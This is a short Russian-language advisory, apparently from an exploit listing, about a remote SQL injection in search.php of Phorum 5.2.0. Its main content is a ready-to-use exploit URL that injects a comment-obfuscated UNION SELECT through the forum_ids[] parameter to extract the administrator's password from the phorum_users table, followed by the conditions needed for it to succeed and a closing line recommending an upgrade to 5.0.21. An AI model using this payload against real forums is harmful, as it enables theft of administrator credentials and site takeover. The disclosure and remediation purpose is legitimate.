Тип уязвимости: удаленный
Описание:
Уязвимость находится в файле search.php
Эксплоит:
http://localhost/phorum520/search.php?1,search=a,page=1,match_type=ALL,
match_dates=30,match_forum=ALL,body=1,author=1,subject=1,&forum_ids[]=-99)
/**/UNION/**/ALL/**/SELECT/**/1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,21,32/**/FROM/**/phorum_users
/**/WHERE/**/admin=1/**/LIMIT/**/1/*
1. «register_globals» должны быть включены.
2. «search=a» эта запись должна возвращать результат поиска.
3. «SELECT/**/1,password» первый номер в инъекции, в нашем случае «1»,
должен быть «forum_id» в результатах поиска.
Решение:
Обновить до версии 5.0.21